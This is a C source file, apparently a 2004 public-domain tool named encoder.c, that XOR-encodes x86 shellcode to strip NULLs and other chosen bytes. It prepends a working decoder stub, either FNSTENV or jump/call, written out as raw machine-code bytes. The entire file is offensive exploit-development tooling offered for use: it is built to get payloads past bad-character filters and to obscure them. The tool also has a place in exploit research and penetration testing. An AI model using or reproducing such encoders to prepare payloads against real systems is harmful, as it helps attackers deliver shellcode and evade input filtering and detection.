
/*
 *
 * encoder.c - Encode NULLs and other characters out of shellcode
 * Copyright (c) Jarkko Turkulainen 2004. All rights reserved.
 *
 * Compile: cl encoder.c (MS Visual C)
 *          cc -o encoder encoder.c (Unix)
 *
 * This program tries to eliminate NULLs and other user-defined
 * characters out of shellcode. It uses a simple XOR and includes
 * a built-in decoder routine for x86.
 *
 * This program is public domain, do whatever pleases you with it.
 * If you like it, let me know!
 *
 * Usage: encoder <shellcode> <bytes> [-f|-j|-n]
 * 
 * - "shellcode" is the binary shellcode file
 * - "bytes" are comma-separated list of bytes that are encoded
 * - Use "-f" for FNSTENV XOR byte decoder (default)
 * - Use "-j" for traditional jump/call decoder
 * - Use "-n" if you don't need the built-in decoder
 * - If no decoder defined, "-f" is used
 * - Encoded shellcode is printed in _standard_output_ (NOTE!!!)
 *
 * Example: encoder code.s 0x00,0x0a,0x0d > out.s
 *
 * How it works: It tries to find a number that won't produce any of the
 * user-defined bytes when XOR'ed with any of the bytes in shellcode. If
 * it finds a one, it XORs the shellcode with that number. And in the end,
 * it adjusts the built-in decoder to produce and run the original 
 * shellcode (if -n was not defined in command line). Very simple in theory,
 * and it seems to even work sometimes.
 *
 * How to customize:
 *
 * 1) Modify the jump/call decoder marker string (highly recommended)
 *   Length is always 4 bytes. Not needed for FNSTENV XOR byte decoder!!
 */
unsigned char marker[] = {
	0x65, 0x6F, 0x66, 0x64
};

/*
 * 2) Change the decoder register (eax, ebx, ecx, edx)
 *    (only ebx or edx allowed for FNSTENV XOR decoder)
 */
#define REGISTER "edx"


/*
 * Credits:
 * H.D. Moore, http://metasploit.com (FNSTENV XOR byte decoder)
 * Steve Fewer, http://www.harmonysecurity.com (jump/call decoder)
 *
 */


#if defined _WIN32
#include <windows.h>
#endif
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>

/* Register codes */
#define REG_EAX		0
#define REG_EBX		1
#define REG_ECX		2
#define REG_EDX		3

/* Decoders */
#define	DECODER_FNSTENV	0
#define DECODER_JUMP	1
#define DECODER_NONE	2

/* Actual decoders, DO NOT MODIFY! */
unsigned char decoder_jump_header1[] = {
	0xEB, 0x0F, 0x58, 0x80, 0x30, 0x99, 0x40, 0x81, 
	0x38
};
unsigned char decoder_jump_header2[] = {
	0x75, 0xF4, 0xEB, 0x05, 0xE8, 0xEC, 0xFF, 0xFF, 
	0xFF
};
unsigned char decoder_fnstenv_header[] = {
	0xD9, 0xE1, 0xD9, 0x34, 0x24, 0x5B, 0x5B, 0x5B, 
	0x5B, 0x80, 0xEB, 0xE7, 0x31, 0xC9, 0x66, 0x81, 
	0xE9, 0xA1, 0xFE, 0x80, 0x33, 0x99, 0x43, 0xE2, 
	0xFA
};


#define VERSION	"0.3"

int main(int argc, char **argv) {
	char		*ptr, *filebuf, *shellbuf;
	struct stat	sstat;
	FILE 		*fp;
	int		i, j, k, c;
	int		reg, try, found;
	int		decoder, total, len, size, index;
	unsigned char	encode_byte, *encode_bytes;

	decoder = 1;
	index = 1;
	
	/* Print banner */
	fprintf(stderr,"\nEncoder v%s - Encode NULLs and other characters out of shellcode\n"
		"Copyright (c) Jarkko Turkulainen 2004. All rights reserved.\n"
		"Read the file encoder.c for documentation.\n\n", VERSION);

	/* Check command line parameters */
	if (argc < 3) {
		fprintf(stderr,"Usage: %s <shellcode> <bytes> [-f|-j|-n] \n"
			"\t-f use FNSTENV XOR byte decoder\n"
			"\t-j use traditional jump/call decoder\n"
			"\t-n do not include decoder in output\n", argv[0]);
		fprintf(stderr,"\nExample: encoder code.s 0x00,0x0a,0x0d > out.s\n");
		exit(0);
        }
	if ((argc >= 4) && !strncmp(argv[3], "-n", 2))
		decoder = DECODER_NONE;
	else if ((argc >= 4) && !strncmp(argv[3], "-j", 2)) {
		decoder = DECODER_JUMP;
		fprintf(stderr,"Using jump/call decoder\n"
			"Using register %s for decoder\n", REGISTER);
	} else {
		decoder = DECODER_FNSTENV;
		fprintf(stderr,"Using FNSTENV XOR decoder\n"
			"Using register %s for decoder\n", REGISTER);
	}
	/* Check out register */
	if (!strncmp(REGISTER, "eax", 3) && 
		(decoder != DECODER_FNSTENV))
		reg = REG_EAX;
	else if (!strncmp(REGISTER, "ebx", 3))
		reg = REG_EBX;
	else if (!strncmp(REGISTER, "ecx", 3) && 
		(decoder != DECODER_FNSTENV))
		reg = REG_ECX;
	else if (!strncmp(REGISTER, "edx", 3))
		reg = REG_EDX;
	else
		reg = REG_EDX;

	/* Scan for encode bytes, 1st round */
	for (i = 1, ptr= argv[2]; *ptr != '\0'; ptr++) {
		if (*ptr == ',') i++;
	}

	/* Space for encode bytes: */
	size = i;
	if (!(encode_bytes = (unsigned char *)malloc(size * sizeof(unsigned char))))
		exit (1);
	

	/* Scan for encode bytes, 2nd round */
	encode_bytes[0] =  strtoul(argv[2], NULL, 0);
	for (i = 1, ptr = argv[2]; *ptr != '\0'; ptr++) {
		if ((*ptr == ',') && (*(ptr+1) != '\0')) {
			encode_bytes[i] =  strtoul(ptr+1, NULL, 0);
			i++;
		}
	}
	fprintf(stderr,"Removing bytes");
	for (i = 0; i < size; i++)
		fprintf(stderr," 0x%.2X", encode_bytes[i]);
	fprintf(stderr,"\n");

	/* Open shellcode file */
	fprintf(stderr,"Reading shellcode from \"%s\"\n", argv[1]);
    	fp = fopen(argv[1], "r+b");
        if( fp == NULL ) {
		fprintf(stderr,"Error: unable to open file \"%s\"\n", argv[1]);
		exit(0);
        }
	/* Get file len */
	c = stat(argv[1], &sstat);
	if (c == -1) {
		exit (1);
	}
	len = sstat.st_size;

	/* Allocate space for file */
	if (!(filebuf = (char *)malloc(len)))
		exit (1);

	/* Read file in allocated space */
	c = fread(filebuf, 1, len, fp);
	fclose(fp);
	if (c != len) {
		exit (1);
	}
	
	/* Scan the shellcode for suitable encode byte */
	for (i = 1; i < 255; i++) {

		/* Mark the candidate as found */
		found = 1;

		/* Try out every byte in encode_bytes array */
		for (j = 0; j < size; j++) {

			/* XOR candidate with the excluded bytes */
			try = i^encode_bytes[j];
			
			/* Now try every byte in shellcode */
			for (k = 0; k < len; k++) {

				c = 0xff&filebuf[k];
	
				/* If match, mark the candidate "not found" */
				if (c == try) {
					found = 0;
					break;
				}
			}
		}
		/* Break out if byte found */
		if (found == 1) break;
	}
	if (found == 1) {
		fprintf(stderr,"Using 0x%.2X for XOR\n", i);
		encode_byte = i;
	} else {
		fprintf(stderr,"Error: cannot found encode byte value\n");
		exit (0);
	}

	/* No decoder, simple print: */
	if (decoder == DECODER_NONE) {
		for (c = 0; c < len; c++) {
			fputc(filebuf[c]^encode_byte, stdout);
		}
		fprintf(stderr,"Ready\n");
		exit (0);
	}

	/* Allocate space for final shellcode */
	if (decoder == DECODER_JUMP) {
		total = len + sizeof(decoder_jump_header1) + 
			2*sizeof(marker) + sizeof(decoder_jump_header2);
	} else {
		total = len + sizeof(decoder_fnstenv_header);
	}
	if (!(shellbuf = (char *)malloc(total)))
		exit (1);

	/* Create the new shellcode */

	/* jump/call decoder */

	if (decoder == DECODER_JUMP) {
		/* Copy 1st header */
		memcpy(&shellbuf[0], decoder_jump_header1, 
			sizeof(decoder_jump_header1));

		/* Copy marker */
		memcpy(&shellbuf[sizeof(decoder_jump_header1)], 
			marker, sizeof(marker));

		/* Copy 2nd header */
		memcpy(&shellbuf[sizeof(decoder_jump_header1) + sizeof(marker)], 
			decoder_jump_header2, sizeof(decoder_jump_header2));

		/* Copy the actual shellcode */
		for (i = 0; i < len; i++)
			filebuf[i] = filebuf[i]^encode_byte;
		memcpy(&shellbuf[sizeof(decoder_jump_header1) + sizeof(marker) + sizeof(decoder_jump_header2)], 
			filebuf, len);

		/* Copy marker */
		memcpy(&shellbuf[total - sizeof(marker)], 
			marker, sizeof(marker));

		/* Make sure that the marker is not in shellcode */
		for (i = 0; i < len; i++) {
			c = memcmp((void *)&filebuf[i], (void *)marker, 
				sizeof(marker));
			if (c == 0) {
				fprintf(stderr,"Error: try to change marker[]\n");
				exit (1);
			}
		}
		/* XOR byte */
		shellbuf[5] = encode_byte;

		/* Decoder register */
		switch (reg) {
			case REG_EAX:
				shellbuf[2] = 0x58;
				shellbuf[4] = 0x30;
				shellbuf[6] = 0x40;
				shellbuf[8] = 0x38;
				break;
			case REG_ECX:
				shellbuf[2] = 0x59;
				shellbuf[4] = 0x31;
				shellbuf[6] = 0x41;
				shellbuf[8] = 0x39;
				break;
			case REG_EDX:
				shellbuf[2] = 0x5a;
				shellbuf[4] = 0x32;
				shellbuf[6] = 0x42;
				shellbuf[8] = 0x3a;
				break;
			case REG_EBX:
				shellbuf[2] = 0x5b;
				shellbuf[4] = 0x33;
				shellbuf[6] = 0x43;
				shellbuf[8] = 0x3b;
				break;
		}
		
	/* FNSTENV XOR byte decoder */

	} else {

		/* Copy header */
		memcpy(&shellbuf[0], decoder_fnstenv_header, 
			sizeof(decoder_fnstenv_header));

		/* Copy the actual shellcode */
		for (i = 0; i < len; i++)
			filebuf[i] = filebuf[i]^encode_byte;
		memcpy(&shellbuf[sizeof(decoder_fnstenv_header)], 
			filebuf, len);

		/* High len byte: */
		shellbuf[18] = ((0x10000-len)>>8)&0xff;

		/* Low len byte: */
		shellbuf[17] = (0x10000-len)&0xff;
		/* Adjust, if needed.. */
		if (shellbuf[17] == 0)
			shellbuf[17]++;

		/* XOR byte */
		shellbuf[21] = encode_byte;

		/* Decoder register */
		switch (reg) {
			case REG_EDX:
				shellbuf[5] = 0x5a;
				shellbuf[6] = 0x5a;
				shellbuf[7] = 0x5a;
				shellbuf[8] = 0x5a;
				shellbuf[10] = 0xea;
				shellbuf[20] = 0x32;
				shellbuf[22] = 0x42;
				break;
			case REG_EBX:
				shellbuf[5] = 0x5b;
				shellbuf[6] = 0x5b;
				shellbuf[7] = 0x5b;
				shellbuf[8] = 0x5b;
				shellbuf[10] = 0xeb;
				shellbuf[20] = 0x33;
				shellbuf[22] = 0x43;
				break;
		}

	}

	/* Print out the code */
	for (c = 0; c < total; c++) {
		fputc(shellbuf[c], stdout);
	}
	fprintf(stderr,"Ready\n");
	
	return (0);
}

